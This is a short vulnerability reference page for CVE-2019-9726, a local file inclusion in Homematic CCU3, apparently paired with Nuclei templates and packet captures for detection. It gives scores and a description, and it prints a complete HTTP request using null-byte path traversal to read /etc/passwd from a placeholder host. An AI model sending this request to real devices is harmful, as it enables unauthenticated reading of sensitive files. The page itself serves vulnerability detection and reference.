🔙 목록으로 돌아가기

CVE-2019-9726: Homematic CCU3 - Local File Inclusion

TitleHomematic CCU3 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the system.
RemediationApply the latest security patches or updates provided by the vendor.
CVSS Score7.5
EPSS Score0.58772
CVE IDCVE-2019-9726
CWE IDCWE-22
Tags cve2019 cve homematic lfi eq-3 vuln

🔍 Vulnerability Description

eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device’s filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.

🌐 HTTP Request

GET /.%00./.%00./etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9726.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9726.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A